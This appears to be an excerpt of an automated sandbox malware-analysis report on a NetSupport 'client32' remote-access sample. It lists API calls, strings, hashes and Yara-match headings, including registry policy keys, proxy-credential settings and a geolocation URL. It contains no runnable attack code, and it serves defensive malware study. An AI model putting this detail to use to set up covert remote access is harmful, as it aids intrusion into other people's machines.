                                                                                                                                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                                                    • API String ID: 4109833150-3803836183
                                                                                                                                                                                                    • Opcode ID: 212825261dc7ad45365317bf66098bda66adb5082d998191289fd6b69446b11f
                                                                                                                                                                                                    • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212825261dc7ad45365317bf66098bda66adb5082d998191289fd6b69446b11f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C), ref: 11073B95
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000024), ref: 11073B9B
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11073BA1
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000DB1C), ref: 11073BAA
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000054), ref: 11073BB0
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000006C), ref: 11073BB6
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,00000001,00000000), ref: 11073C7F
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,Function_0006FD70,00000000,00000000,?), ref: 11073D1C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000001,00000000), ref: 11073D23
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection$CloseCreateEnvironmentErrorExitExpandHandleLastMessageProcessStringsThreadwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL$tj
                                                                                                                                                                                                    • API String ID: 2317329843-624511195
                                                                                                                                                                                                    • Opcode ID: b64db9be393d21858828107b08024ed2c37c646a5a2dcafe481e79fb9172f6ad
                                                                                                                                                                                                    • Instruction ID: 96e53a99b37afd88effbccddcb99d5044153cbf19089882f4136f072ae1633ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b64db9be393d21858828107b08024ed2c37c646a5a2dcafe481e79fb9172f6ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A71EAB1B00309AFE711DBA4CC85FE9F7B5BB88704F0084A9E3159B281EB70B944CB65
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                                                                                                                    • API String ID: 2111968516-2157635994
                                                                                                                                                                                                    • Opcode ID: 8b63a1dac977ab35b8c47f62be936f8e6fe2423304d8069a5d6a5a9d72322eb6
                                                                                                                                                                                                    • Instruction ID: 9668ebde70b29493483c650e7e485da13943312fc57ec0df0c8d21fe434bcc19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b63a1dac977ab35b8c47f62be936f8e6fe2423304d8069a5d6a5a9d72322eb6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B422B5B2A04358AFDB25CFA4CC80EEEB3BDAB49304F8485D9E55967540D6329F84CF52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,BBC4A55B,027F70A0,027F7090,?,00000000,1117ED9C,000000FF,?,11031392,027F70A0,00000000,?,?,?), ref: 11084F85
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1108505B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11085072
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11085089
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084BD8
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084BEB
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084BFE
                                                                                                                                                                                                      • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084C11
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad
                                                                                                                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                                                                    • API String ID: 1281665014-2492245516
                                                                                                                                                                                                    • Opcode ID: e79e8737a57767a360234bba90a97f9ccf4e5079ef7247a1568b48b9923ce02a
                                                                                                                                                                                                    • Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e79e8737a57767a360234bba90a97f9ccf4e5079ef7247a1568b48b9923ce02a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                                                                                                                    • Opcode ID: 3419b364451b030f4c1ae17ea76cb3df227c77bbc6b46c8a377cef6aa527b1dd
                                                                                                                                                                                                    • Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3419b364451b030f4c1ae17ea76cb3df227c77bbc6b46c8a377cef6aa527b1dd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027E84
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027F01
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11027F17
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11027F20
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait
                                                                                                                                                                                                    • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                                                                    • API String ID: 2132705056-1744591295
                                                                                                                                                                                                    • Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                                                                                    • Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 11030457
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 11030465
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(023A8D48,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
                                                                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
                                                                                                                                                                                                    • API String ID: 711497182-3782231422
                                                                                                                                                                                                    • Opcode ID: fbf71ec49f53600c72b87a96e154c6fc632858b50e963b64517ef1cdb7f6b3f1
                                                                                                                                                                                                    • Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbf71ec49f53600c72b87a96e154c6fc632858b50e963b64517ef1cdb7f6b3f1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76596610,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 110303C3
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(023A8D48,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue
                                                                                                                                                                                                    • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    • API String ID: 1342853979-2190704750
                                                                                                                                                                                                    • Opcode ID: 3b59737b017a528acb193203f0270af2f5a2ea3ef6b731abf40abcba2d20a93b
                                                                                                                                                                                                    • Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b59737b017a528acb193203f0270af2f5a2ea3ef6b731abf40abcba2d20a93b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102C09A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102C194
                                                                                                                                                                                                      • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandlewvsprintf
                                                                                                                                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                                                                    • API String ID: 137821192-1725438197
                                                                                                                                                                                                    • Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                                                                                                    • Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                                                                                    • Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                                                                                    • Instruction ID: cd76c2840a1715f7d7d399ef9620e7e6cb5bc654635ea96c8559331baeb526dc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF417175B4022DABEB21CA11CC81FEEB77CEB54708F1041D9F659A6140DBB06A85CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                                                                                      • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                                                                                                                    • Opcode ID: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                                                                                    • Instruction ID: 375c621035b705b1b9e3f4a5420693f98d17ac4dbe140293a3c4dc63feaf086a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F74181B5B4022DABEB21CA118C81FEEB77CEB54708F1041D5F658A6140DBB06E81CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                      • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                      • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,027E0500,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion
                                                                                                                                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                                                    • API String ID: 1322952435-1114959992
                                                                                                                                                                                                    • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,BBC4A55B), ref: 1102CA84
                                                                                                                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
